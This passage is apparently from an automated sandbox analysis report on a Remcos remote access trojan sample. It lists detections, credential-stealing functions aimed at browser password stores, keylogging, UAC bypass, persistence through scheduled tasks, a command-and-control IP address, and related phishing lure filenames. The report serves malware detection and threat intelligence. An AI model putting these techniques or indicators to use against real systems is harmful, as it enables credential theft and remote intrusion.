                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Roaming\jdSldfVS.exeQueries volume information: C:\Users\user\AppData\Roaming\jdSldfVS.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Roaming\jdSldfVS.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Roaming\jdSldfVS.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Roaming\jdSldfVS.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Roaming\jdSldfVS.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Roaming\jdSldfVS.exeCode function: 17_2_0040B164 GetLocalTime,wsprintfW,17_2_0040B164
                  Source: C:\Users\user\AppData\Roaming\jdSldfVS.exeCode function: 17_2_0041B60D GetUserNameW,17_2_0041B60D
                  Source: C:\Users\user\AppData\Roaming\jdSldfVS.exeCode function: 17_2_00449190 _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,17_2_00449190
                  Source: C:\Users\user\Desktop\HUED23EDE5UGRFQ.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                  Stealing of Sensitive Information

                  barindex
                  Yara detected Remcos RAT
                  Source: Yara matchFile source: 17.2.jdSldfVS.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 10.2.jdSldfVS.exe.42782c0.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.HUED23EDE5UGRFQ.exe.356f910.3.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 17.2.jdSldfVS.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.HUED23EDE5UGRFQ.exe.34f6ef0.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 10.2.jdSldfVS.exe.42f0ce0.3.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.HUED23EDE5UGRFQ.exe.356f910.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.HUED23EDE5UGRFQ.exe.34f6ef0.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 10.2.jdSldfVS.exe.42f0ce0.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 10.2.jdSldfVS.exe.42782c0.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000009.00000002.4580750131.0000000002B6F000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000009.00000002.4577861683.0000000001007000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000011.00000002.2185308624.0000000000BDA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.2170172636.00000000034F6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000A.00000002.2208800454.0000000004278000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: HUED23EDE5UGRFQ.exe PID: 2820, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: HUED23EDE5UGRFQ.exe PID: 4896, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: jdSldfVS.exe PID: 6124, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: jdSldfVS.exe PID: 6996, type: MEMORYSTR
                  Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED
                  Contains functionality to steal Chrome passwords or cookies
                  Source: C:\Users\user\AppData\Roaming\jdSldfVS.exeCode function: \AppData\Local\Google\Chrome\User Data\Default\Login Data17_2_0040BA12
                  Contains functionality to steal Firefox passwords or cookies
                  Source: C:\Users\user\AppData\Roaming\jdSldfVS.exeCode function: \AppData\Roaming\Mozilla\Firefox\Profiles\17_2_0040BB30
                  Source: C:\Users\user\AppData\Roaming\jdSldfVS.exeCode function: \key3.db17_2_0040BB30

                  Remote Access Functionality

                  barindex
                  Detected Remcos RAT
                  Source: C:\Users\user\Desktop\HUED23EDE5UGRFQ.exeMutex created: \Sessions\1\BaseNamedObjects\Rmc-HKC0PVJump to behavior
                  Source: C:\Users\user\AppData\Roaming\jdSldfVS.exeMutex created: \Sessions\1\BaseNamedObjects\Rmc-HKC0PV
                  Yara detected Remcos RAT
                  Source: Yara matchFile source: 17.2.jdSldfVS.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 10.2.jdSldfVS.exe.42782c0.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.HUED23EDE5UGRFQ.exe.356f910.3.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 17.2.jdSldfVS.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.HUED23EDE5UGRFQ.exe.34f6ef0.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 10.2.jdSldfVS.exe.42f0ce0.3.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.HUED23EDE5UGRFQ.exe.356f910.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.HUED23EDE5UGRFQ.exe.34f6ef0.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 10.2.jdSldfVS.exe.42f0ce0.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 10.2.jdSldfVS.exe.42782c0.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000009.00000002.4580750131.0000000002B6F000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000009.00000002.4577861683.0000000001007000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000011.00000002.2185308624.0000000000BDA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.2170172636.00000000034F6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000A.00000002.2208800454.0000000004278000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: HUED23EDE5UGRFQ.exe PID: 2820, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: HUED23EDE5UGRFQ.exe PID: 4896, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: jdSldfVS.exe PID: 6124, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: jdSldfVS.exe PID: 6996, type: MEMORYSTR
                  Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED
                  Source: C:\Users\user\AppData\Roaming\jdSldfVS.exeCode function: cmd.exe17_2_0040569A

                  Mitre Att&ck Matrix

                  ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                  Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
                  Native API                  		1
                  DLL Side-Loading                  		1
                  DLL Side-Loading                  		11
                  Disable or Modify Tools                  		1
                  OS Credential Dumping                  		2
                  System Time Discovery                  		Remote Services11
                  Archive Collected Data                  		12
                  Ingress Tool Transfer                  		Exfiltration Over Other Network Medium1
                  System Shutdown/Reboot
                  CredentialsDomainsDefault Accounts1
                  Command and Scripting Interpreter                  		1
                  Windows Service                  		1
                  Bypass User Account Control                  		1
                  Deobfuscate/Decode Files or Information                  		211
                  Input Capture                  		1
                  Account Discovery                  		Remote Desktop Protocol211
                  Input Capture                  		2
                  Encrypted Channel                  		Exfiltration Over Bluetooth1
                  Defacement
                  Email AddressesDNS ServerDomain Accounts1
                  Scheduled Task/Job                  		1
                  Scheduled Task/Job                  		1
                  Access Token Manipulation                  		4
                  Obfuscated Files or Information                  		2
                  Credentials In Files                  		1
                  System Service Discovery                  		SMB/Windows Admin Shares3
                  Clipboard Data                  		1
                  Non-Standard Port                  		Automated ExfiltrationData Encrypted for Impact
                  Employee NamesVirtual Private ServerLocal Accounts2
                  Service Execution                  		Login Hook1
                  Windows Service                  		12
                  Software Packing                  		NTDS3
                  File and Directory Discovery                  		Distributed Component Object ModelInput Capture1
                  Remote Access Software                  		Traffic DuplicationData Destruction
                  Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script122
                  Process Injection                  		1
                  DLL Side-Loading                  		LSA Secrets33
                  System Information Discovery                  		SSHKeylogging2
                  Non-Application Layer Protocol                  		Scheduled TransferData Encrypted for Impact
                  Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts1
                  Scheduled Task/Job                  		1
                  Bypass User Account Control                  		Cached Domain Credentials121
                  Security Software Discovery                  		VNCGUI Input Capture12
                  Application Layer Protocol                  		Data Transfer Size LimitsService Stop
                  DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                  Masquerading                  		DCSync31
                  Virtualization/Sandbox Evasion                  		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                  Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job31
                  Virtualization/Sandbox Evasion                  		Proc Filesystem3
                  Process Discovery                  		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                  Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
                  Access Token Manipulation                  		/etc/passwd and /etc/shadow1
                  Application Window Discovery                  		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                  IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron122
                  Process Injection                  		Network Sniffing1
                  System Owner/User Discovery                  		Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement

                  Behavior Graph

                  Hide Legend

                  Legend:

                  • Process
                  • Signature
                  • Created File
                  • DNS/IP Info
                  • Is Dropped
                  • Is Windows Process
                  • Number of created Registry Values
                  • Number of created Files
                  • Visual Basic
                  • Delphi
                  • Java
                  • .Net C# or VB.NET
                  • C, C++ or other language
                  • Is malicious
                  • Internet
                  behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1465543 Sample: HUED23EDE5UGRFQ.exe Startdate: 01/07/2024 Architecture: WINDOWS Score: 100 53 geoplugin.net 2->53 59 Snort IDS alert for network traffic 2->59 61 Found malware configuration 2->61 63 Malicious sample detected (through community Yara rule) 2->63 65 13 other signatures 2->65 8 jdSldfVS.exe 5 2->8         started        11 HUED23EDE5UGRFQ.exe 7 2->11         started        signatures3 process4 file5 67 Antivirus detection for dropped file 8->67 69 Multi AV Scanner detection for dropped file 8->69 71 Contains functionality to bypass UAC (CMSTPLUA) 8->71 77 7 other signatures 8->77 14 jdSldfVS.exe 8->14         started        17 schtasks.exe 1 8->17         started        19 jdSldfVS.exe 8->19         started        21 jdSldfVS.exe 8->21         started        45 C:\Users\user\AppData\Roaming\jdSldfVS.exe, PE32 11->45 dropped 47 C:\Users\...\jdSldfVS.exe:Zone.Identifier, ASCII 11->47 dropped 49 C:\Users\user\AppData\Local\...\tmpAF95.tmp, XML 11->49 dropped 51 C:\Users\user\...\HUED23EDE5UGRFQ.exe.log, ASCII 11->51 dropped 73 Uses schtasks.exe or at.exe to add and modify task schedules 11->73 75 Adds a directory exclusion to Windows Defender 11->75 23 HUED23EDE5UGRFQ.exe 3 16 11->23         started        27 powershell.exe 23 11->27         started        29 powershell.exe 23 11->29         started        31 schtasks.exe 1 11->31         started        signatures6 process7 dnsIp8 33 conhost.exe 17->33         started        55 94.156.69.93, 2973, 49712 TERASYST-ASBG Bulgaria 23->55 57 geoplugin.net 178.237.33.50, 49715, 80 ATOM86-ASATOM86NL Netherlands 23->57 43 C:\ProgramData\remcos\logs.dat, data 23->43 dropped 79 Detected Remcos RAT 23->79 81 Installs a global keyboard hook 23->81 83 Loading BitLocker PowerShell Module 27->83 35 WmiPrvSE.exe 27->35         started        37 conhost.exe 27->37         started        39 conhost.exe 29->39         started        41 conhost.exe 31->41         started        file9 signatures10 process11

                  Screenshots

                  Thumbnails

                  This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                  windows-stand

                  Antivirus, Machine Learning and Genetic Malware Detection

                  Initial Sample

                  SourceDetectionScannerLabelLink
                  HUED23EDE5UGRFQ.exe32%ReversingLabsByteCode-MSIL.Trojan.XWorm
                  HUED23EDE5UGRFQ.exe100%AviraHEUR/AGEN.1308776
                  HUED23EDE5UGRFQ.exe100%Joe Sandbox ML

                  Dropped Files

                  SourceDetectionScannerLabelLink
                  C:\Users\user\AppData\Roaming\jdSldfVS.exe100%AviraHEUR/AGEN.1308776
                  C:\Users\user\AppData\Roaming\jdSldfVS.exe100%Joe Sandbox ML
                  C:\Users\user\AppData\Roaming\jdSldfVS.exe32%ReversingLabsByteCode-MSIL.Trojan.XWorm

                  Unpacked PE Files

                  No Antivirus matches

                  Domains

                  No Antivirus matches

                  URLs

                  SourceDetectionScannerLabelLink
                  http://geoplugin.net/json.gp0%URL Reputationsafe
                  http://geoplugin.net/json.gp/C0%URL Reputationsafe
                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
                  http://geoplugin.net/json.gpiiB0%Avira URL Cloudsafe
                  94.156.69.930%Avira URL Cloudsafe
                  http://geoplugin.net/json.gpl0%Avira URL Cloudsafe

                  Domains and IPs

                  Contacted Domains

                  NameIPActiveMaliciousAntivirus DetectionReputation
                  geoplugin.net
                  		178.237.33.50
                  		truefalse
                    		unknown

                    Contacted URLs

                    NameMaliciousAntivirus DetectionReputation
                    http://geoplugin.net/json.gpfalse
                    • URL Reputation: safe
                    		unknown
                    94.156.69.93true
                    • Avira URL Cloud: safe
                    		unknown

                    URLs from Memory and Binaries

                    NameSourceMaliciousAntivirus DetectionReputation
                    http://geoplugin.net/json.gp/CHUED23EDE5UGRFQ.exe, 00000000.00000002.2170172636.00000000034F6000.00000004.00000800.00020000.00000000.sdmp, jdSldfVS.exe, 0000000A.00000002.2208800454.0000000004278000.00000004.00000800.00020000.00000000.sdmp, jdSldfVS.exe, 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://geoplugin.net/json.gplHUED23EDE5UGRFQ.exe, 00000009.00000002.4577861683.0000000001041000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameHUED23EDE5UGRFQ.exe, 00000000.00000002.2168229174.0000000002491000.00000004.00000800.00020000.00000000.sdmp, jdSldfVS.exe, 0000000A.00000002.2206237212.0000000003211000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://geoplugin.net/json.gpiiBHUED23EDE5UGRFQ.exe, 00000009.00000002.4577861683.0000000001041000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown

                    World Map of Contacted IPs

                    • No. of IPs < 25%
                    • 25% < No. of IPs < 50%
                    • 50% < No. of IPs < 75%
                    • 75% < No. of IPs

                    Public IPs

                    IPDomainCountryFlagASNASN NameMalicious
                    94.156.69.93
                    		unknownBulgaria
                    		31420TERASYST-ASBGtrue
                    178.237.33.50
                    		geoplugin.netNetherlands
                    		8455ATOM86-ASATOM86NLfalse

                    General Information

                    Joe Sandbox version:40.0.0 Tourmaline
                    Analysis ID:1465543
                    Start date and time:2024-07-01 19:41:06 +02:00
                    Joe Sandbox product:CloudBasic
                    Overall analysis duration:0h 9m 22s
                    Hypervisor based Inspection enabled:false
                    Report type:full
                    Cookbook file name:default.jbs
                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                    Number of analysed new started processes analysed:21
                    Number of new started drivers analysed:0
                    Number of existing processes analysed:0
                    Number of existing drivers analysed:0
                    Number of injected processes analysed:0
                    Technologies:
                    • HCA enabled
                    • EGA enabled
                    • AMSI enabled
                    Analysis Mode:default
                    Analysis stop reason:Timeout
                    Sample name:HUED23EDE5UGRFQ.exe
                    Detection:MAL
                    Classification:mal100.rans.troj.spyw.expl.evad.winEXE@23/17@1/2
                    EGA Information:
                    • Successful, ratio: 75%
                    HCA Information:
                    • Successful, ratio: 98%
                    • Number of executed functions: 171
                    • Number of non-executed functions: 220
                    Cookbook Comments:
                    • Found application associated with file extension: .exe
                    • Override analysis time to 240000 for current running targets taking high CPU consumption

                    Warnings

                    • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                    • Excluded domains from analysis (whitelisted): client.wns.windows.com, fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                    • Execution Graph export aborted for target HUED23EDE5UGRFQ.exe, PID 4896 because there are no executed function
                    • Not all processes where analyzed, report is missing behavior information
                    • Report size exceeded maximum capacity and may have missing behavior information.
                    • Report size getting too big, too many NtCreateKey calls found.
                    • Report size getting too big, too many NtOpenKeyEx calls found.
                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                    • Report size getting too big, too many NtQueryValueKey calls found.
                    • VT rate limit hit for: HUED23EDE5UGRFQ.exe

                    Simulations

                    Behavior and APIs

                    TimeTypeDescription
                    13:41:56API Interceptor7614019x Sleep call for process: HUED23EDE5UGRFQ.exe modified
                    13:41:58API Interceptor33x Sleep call for process: powershell.exe modified
                    13:42:01API Interceptor1x Sleep call for process: jdSldfVS.exe modified
                    19:41:58Task SchedulerRun new task: jdSldfVS path: C:\Users\user\AppData\Roaming\jdSldfVS.exe

                    Joe Sandbox View / Context

                    IPs

                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                    94.156.69.93UHUH45EDRFQ.exeGet hashmaliciousRemcosBrowse
                      178.237.33.50DHL Shipping Document Awb & BL.vbsGet hashmaliciousGuLoader, RemcosBrowse
                      • geoplugin.net/json.gp
                      tWitaq427K.exeGet hashmaliciousRemcos, AgentTeslaBrowse
                      • geoplugin.net/json.gp
                      TOP URGENT PURCHASE ORDER SHEET & SPECIFICATIONS.vbsGet hashmaliciousGuLoader, RemcosBrowse
                      • geoplugin.net/json.gp
                      Offer ZI-0428.docGet hashmaliciousRemcosBrowse
                      • geoplugin.net/json.gp
                      cKiTq7RRCn.exeGet hashmaliciousRemcosBrowse
                      • geoplugin.net/json.gp
                      INQUIRY#809676-JULY1.xla.xlsxGet hashmaliciousRemcosBrowse
                      • geoplugin.net/json.gp
                      INQUIRY#809676-JULY1.xla.xlsxGet hashmaliciousRemcosBrowse
                      • geoplugin.net/json.gp
                      Quotation.xlsGet hashmaliciousRemcosBrowse
                      • geoplugin.net/json.gp
                      awb_shipping_post_01072024224782020031808174CN18010724000000124(991KB).vbsGet hashmaliciousGuLoader, RemcosBrowse
                      • geoplugin.net/json.gp
                      Maersk_BL_Invoice_Packinglist.vbsGet hashmaliciousGuLoader, RemcosBrowse
                      • geoplugin.net/json.gp

                      Domains

                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                      geoplugin.netDHL Shipping Document Awb & BL.vbsGet hashmaliciousGuLoader, RemcosBrowse
                      • 178.237.33.50
                      tWitaq427K.exeGet hashmaliciousRemcos, AgentTeslaBrowse
                      • 178.237.33.50
                      TOP URGENT PURCHASE ORDER SHEET & SPECIFICATIONS.vbsGet hashmaliciousGuLoader, RemcosBrowse
                      • 178.237.33.50
                      Offer ZI-0428.docGet hashmaliciousRemcosBrowse
                      • 178.237.33.50
                      cKiTq7RRCn.exeGet hashmaliciousRemcosBrowse
                      • 178.237.33.50
                      INQUIRY#809676-JULY1.xla.xlsxGet hashmaliciousRemcosBrowse
                      • 178.237.33.50
                      INQUIRY#809676-JULY1.xla.xlsxGet hashmaliciousRemcosBrowse
                      • 178.237.33.50
                      Quotation.xlsGet hashmaliciousRemcosBrowse
                      • 178.237.33.50
                      awb_shipping_post_01072024224782020031808174CN18010724000000124(991KB).vbsGet hashmaliciousGuLoader, RemcosBrowse
                      • 178.237.33.50
                      Maersk_BL_Invoice_Packinglist.vbsGet hashmaliciousGuLoader, RemcosBrowse
                      • 178.237.33.50

                      ASNs

                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                      TERASYST-ASBGs1C1DWgj73.elfGet hashmaliciousMiraiBrowse
                      • 94.156.67.161
                      ScjfNQG5l0.elfGet hashmaliciousUnknownBrowse
                      • 94.156.67.161
                      Jieok44uQ5.elfGet hashmaliciousMiraiBrowse
                      • 94.156.67.161
                      94.156.67.161-mips-2024-07-01T10_28_03.elfGet hashmaliciousMiraiBrowse
                      • 94.156.67.161
                      94.156.67.161-arm-2024-07-01T10_28_03.elfGet hashmaliciousUnknownBrowse
                      • 94.156.67.161
                      UHUH45EDRFQ.exeGet hashmaliciousRemcosBrowse
                      • 94.156.69.93
                      0GrL5SShus.exeGet hashmaliciousXWormBrowse
                      • 94.156.68.110
                      9444f34a94d494a78e19e19f4e1615744e500aca97a56.exeGet hashmaliciousMars Stealer, Stealc, VidarBrowse
                      • 94.156.68.153
                      9mgWSJhsD0.rtfGet hashmaliciousRemcosBrowse
                      • 94.156.68.221
                      1719515826e3bb9af6f04480ac892d4c6a17ba1a711cc73b126620af7dbb5bfec4a271373f775.dat-decoded.exeGet hashmaliciousRemcosBrowse
                      • 94.156.68.221
                      ATOM86-ASATOM86NLDHL Shipping Document Awb & BL.vbsGet hashmaliciousGuLoader, RemcosBrowse
                      • 178.237.33.50
                      tWitaq427K.exeGet hashmaliciousRemcos, AgentTeslaBrowse
                      • 178.237.33.50
                      TOP URGENT PURCHASE ORDER SHEET & SPECIFICATIONS.vbsGet hashmaliciousGuLoader, RemcosBrowse
                      • 178.237.33.50
                      Offer ZI-0428.docGet hashmaliciousRemcosBrowse
                      • 178.237.33.50
                      cKiTq7RRCn.exeGet hashmaliciousRemcosBrowse
                      • 178.237.33.50
                      INQUIRY#809676-JULY1.xla.xlsxGet hashmaliciousRemcosBrowse
                      • 178.237.33.50
                      INQUIRY#809676-JULY1.xla.xlsxGet hashmaliciousRemcosBrowse
                      • 178.237.33.50
                      Quotation.xlsGet hashmaliciousRemcosBrowse
                      • 178.237.33.50
                      awb_shipping_post_01072024224782020031808174CN18010724000000124(991KB).vbsGet hashmaliciousGuLoader, RemcosBrowse
                      • 178.237.33.50
                      Maersk_BL_Invoice_Packinglist.vbsGet hashmaliciousGuLoader, RemcosBrowse
                      • 178.237.33.50

                      JA3 Fingerprints

                      No context

                      Dropped Files

                      No context

                      Created / dropped Files

                      C:\ProgramData\remcos\logs.dat

                      Download File
                      Process:C:\Users\user\Desktop\HUED23EDE5UGRFQ.exe
                      File Type:data
                      Category:dropped
                      Size (bytes):224
                      Entropy (8bit):3.4354190470227914
                      Encrypted:false
                      SSDEEP:3:rhlKlVmNlN3Yb5JWRal2Jl+7R0DAlBG45klovDl65lQWluEkiEW/ufWPlgMlRQln:6lVMPYb5YcIeeDAlOWA7DxbN2fBMMm0v
                      MD5:4CF845C6F4D24FFDB8AE19EB917DCAE7
                      SHA1:14A1E843A9B5DF883CC6D0F74341DDDE22EC5C7A
                      SHA-256:C4D52FDB08880FDA02E3A4F182935D08F3AE7A129CAED0D826C5CA8FDFAA4B79
                      SHA-512:4F2DFE1EA57F5E7D529E94DC24C1B8302DBCA1222C7B3DC07EDAE3A43C19ECABB6409BC174B7DCEC72490969E0B814F283E154E6EEE54F3FC92660FD41B4FF38
                      Malicious:true
                      Yara Hits:
                      • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: C:\ProgramData\remcos\logs.dat, Author: Joe Security
                      Reputation:low
                      Preview:....[.2.0.2.4./.0.7./.0.1. .1.3.:.4.1.:.5.8. .O.f.f.l.i.n.e. .K.e.y.l.o.g.g.e.r. .S.t.a.r.t.e.d.].........[.P.r.o.g.r.a.m. .M.a.n.a.g.e.r.].........{. .U.s.e.r. .h.a.s. .b.e.e.n. .i.d.l.e. .f.o.r. .0. .m.i.n.u.t.e.s. .}.....

                      C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\HUED23EDE5UGRFQ.exe.log

                      Download File
                      Process:C:\Users\user\Desktop\HUED23EDE5UGRFQ.exe
                      File Type:ASCII text, with CRLF line terminators
                      Category:dropped
                      Size (bytes):1216
                      Entropy (8bit):5.34331486778365
                      Encrypted:false
                      SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                      MD5:1330C80CAAC9A0FB172F202485E9B1E8
                      SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                      SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                      SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                      Malicious:true
                      Reputation:high, very likely benign file
                      Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

